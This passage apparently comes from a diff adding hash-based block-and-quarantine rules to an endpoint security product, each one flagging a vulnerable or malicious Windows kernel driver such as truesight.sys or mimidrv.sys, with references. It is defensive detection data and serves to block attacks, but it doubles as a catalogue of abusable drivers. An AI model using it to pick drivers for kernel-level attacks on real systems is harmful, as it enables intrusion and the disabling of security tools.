"2026-03-23T11:45:30.819534Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.819540Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "afda5af5f210336061bff0fab0ed93ee495312bed639ec5db56fbac0ea8247d3", + "comment": "Vulnerable Kernel Driver (aka nvoclock.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "16deda0c-c87a-58c7-82f1-64e64a77d4f7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.604717Z", + "creation_date": "2026-03-23T11:45:29.604719Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.604724Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "70211a3f90376bbc61f49c22a63075d1d4ddd53f0aefa976216c46e6ba39a9f4", + "comment": "Process Hacker driver (aka kprocesshacker.sys) [https://processhacker.sourceforge.io/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "16f47624-8a60-5c5a-b727-295198dec4aa", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, 
+ "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.466378Z", + "creation_date": "2026-03-23T11:45:30.466381Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.466389Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "80e4c83cfa9d675a6746ab846fa5da76d79e87a9297e94e595a2d781e02673b3", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1703161e-a974-5c0c-b228-38797026deb8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.481073Z", + "creation_date": "2026-03-23T11:45:31.481076Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.481086Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": 
"hash", + "value": "1c9a5dd30173da95e9785b5ee1743c50762a113a6af841969d9131fb99e1e96e", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "173410eb-0587-5203-8910-a6e99aacb7b5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.818600Z", + "creation_date": "2026-03-23T11:45:31.818603Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.818611Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "19f89225aa3867d60ac8a21553b642ae7e2d4559c21d685f46e2af81b3456f19", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "173b038a-72e5-5fd6-bb32-f6b37c9ed2f9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + 
"rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.620332Z", + "creation_date": "2026-03-23T11:45:29.620334Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.620339Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "81939e5c12bd627ff268e9887d6fb57e95e6049f28921f3437898757e7f21469", + "comment": "IBM Vulnerable Physmem drivers (aka citmdrv_amd64.sys and citmdrv_ia64.sys) [https://www.loldrivers.io/drivers/0f21a584-6ace-4242-82cb-9766cea6973a/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "174052fe-758a-5e3b-9a33-264f819c1bd4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.159013Z", + "creation_date": "2026-03-23T11:45:31.159015Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.159020Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0c36c97d499a6e3154883aa0e19167aaae0cab01b83bb7a934a7ccbd077df6bc", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware 
Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "174b10e5-f4cc-5157-b01f-732267b2e8a0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.827071Z", + "creation_date": "2026-03-23T11:45:30.827073Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.827079Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8895c23c7d39b59516ea2e411491862391d8aa41575cb58f9446ecd8b5551e9b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "17541b59-f6e9-58f7-be8c-4218994d736e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": 
"2026-03-23T11:45:32.146452Z", + "creation_date": "2026-03-23T11:45:32.146455Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.146460Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "44a89f82bf3303553f9a9fdf136b4453af6d4c777c95da57c5b8baca8506c272", + "comment": "Malicious Kernel Driver (aka driver_1a74c2bd.sys) [https://www.loldrivers.io/drivers/af153e7c-13fa-4a40-a095-00726ad6d783/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "176bf81a-6c4e-5ae3-b7e5-4098aa4ed547", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.827613Z", + "creation_date": "2026-03-23T11:45:30.827615Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.827620Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e6cf6159f63328c4e05587c2acfb5548c3fe9318456c9d12f496f01a783310b2", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} 
+{ + "id": "176d3ad5-b0d1-58fa-ab9f-98ba92b8ca05", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.977979Z", + "creation_date": "2026-03-23T11:45:29.977981Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.977986Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3ba724dd78864cd527a99673fde1bf7f9f85f2415c91708e7380fbe5e2c085dd", + "comment": "Vulnerable Kernel Driver (aka LgDCatcher.sys) [https://www.loldrivers.io/drivers/a8e999ee-746f-4788-9102-c1d3d2914f56/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "177548a7-5548-5218-9f2b-d3259104aa58", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.148382Z", + "creation_date": "2026-03-23T11:45:31.148384Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": 
"2026-03-23T11:45:31.148389Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7883089fb4a9f67201bde1be555948a6c62aaa841c26f965db030e6588cd0d5c", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "177cb25a-7a20-57cc-ab65-bb29a79b744c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.616042Z", + "creation_date": "2026-03-23T11:45:29.616044Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.616050Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "65db1b259e305a52042e07e111f4fa4af16542c8bacd33655f753ef642228890", + "comment": "Phoenix Tech. 
vulnerable BIOS update tool (aka PhlashNT.sys and WinFlash64.sys) [https://www.loldrivers.io/drivers/be3e49ea-095e-4fdb-9529-f4c2dbb9a9fc/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "179a1c0f-1099-5ce6-809a-468f372de81d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.825186Z", + "creation_date": "2026-03-23T11:45:30.825189Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.825197Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4d81fb2f41d806cc7c79ef782de045e78e3b6947dab42dc7888375fd93a781bf", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "17a1e819-a606-5845-95ae-a81bc82b2787", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + 
"last_update": "2026-03-23T11:45:31.475796Z", + "creation_date": "2026-03-23T11:45:31.475800Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.475810Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0d7737e5674fbee8e70e0010d45ba9fff511a0af2bfe467a370c79b075fa6240", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "17b8f50a-2df7-5d65-b4e5-73e8028bd93e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.835666Z", + "creation_date": "2026-03-23T11:45:30.835668Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.835673Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "339158f7636138c7e5cbd797ff300e60f765626f374d5175a4c1a5a59549e944", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file 
SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "17bb0317-9868-5caf-9790-5b011e2aef8b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.492037Z", + "creation_date": "2026-03-23T11:45:31.492039Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.492045Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "db71983915836c7bacf9765601439bdd1150d55a0eb110b3d566fa30b1c3178b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "17bcbb07-5889-586b-b299-430c4b8b397b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.829734Z", + "creation_date": "2026-03-23T11:45:30.829736Z", + "enabled": true, + "block_on_agent": true, + 
"quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.829742Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ad05b7732ac6c21b0fa72690589d7541ce30a1fb874fbb20c4ccdb7cd580a364", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "17d150c0-ab95-5516-949b-5832e334ed49", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.812527Z", + "creation_date": "2026-03-23T11:45:31.812529Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.812534Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "05c219060623be84d7d1beab607fa2a0a6389b89b8489397921dfb95d659f8cb", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "17d4013f-6530-540d-8d28-fed50daadc04", + 
"test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.614144Z", + "creation_date": "2026-03-23T11:45:29.614146Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.614152Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d636c011b8b2896572f5de260eb997182cc6955449b044a739bd19cbe6fdabd2", + "comment": "MICSYS Technology driver (aka MsIo64.sys) [CVE-2019-18845] [https://github.com/kkent030315/MsIoExploit] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "17dd6640-ee07-5841-827c-adca96d9f678", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.604521Z", + "creation_date": "2026-03-23T11:45:29.604523Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.604528Z", + "rule_level": null, + "rule_level_override": null, + 
"rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6ae4d36cf42a3bd1ddf9dd98794b401cd995bc519a12ffbde63e63b03a2424b3", + "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "17f460c2-a541-56e3-99b8-40fe50200abe", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.456335Z", + "creation_date": "2026-03-23T11:45:30.456339Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.456347Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a7416a7d9573f1d8873ec1b3109ec683e85412ba817e0001c3ab2d2c92043d4d", + "comment": "Vulnerable Kernel Driver (aka iobitunlocker.sys) [https://www.loldrivers.io/drivers/e368efc7-cf69-47ae-8204-f69dac000b22/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1801d8f9-96e4-5c8d-88b0-b447c4a7aae5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + 
"last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.480334Z", + "creation_date": "2026-03-23T11:45:31.480338Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.480348Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b1e499701948c14970c52586b63c26e2e180a593977ecaa34b28ed749b2a15ae", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "18063a5f-4ac2-54e7-b232-3ce21d0604f9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.817979Z", + "creation_date": "2026-03-23T11:45:31.817982Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.817990Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0596f9e7390c439b1896ca0561d7cf9114f405b237da2b3fb06595a25f3cf0cd", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware 
Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "181b86d8-8476-59e7-b5d0-8c2616798ce7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.619001Z", + "creation_date": "2026-03-23T11:45:29.619003Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.619009Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6a95f3c5cec52da45f9b74660b81226b4314ec18e761490140173998500ae015", + "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "182515f3-1a2c-505f-8328-e1a87c2d4f2c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + 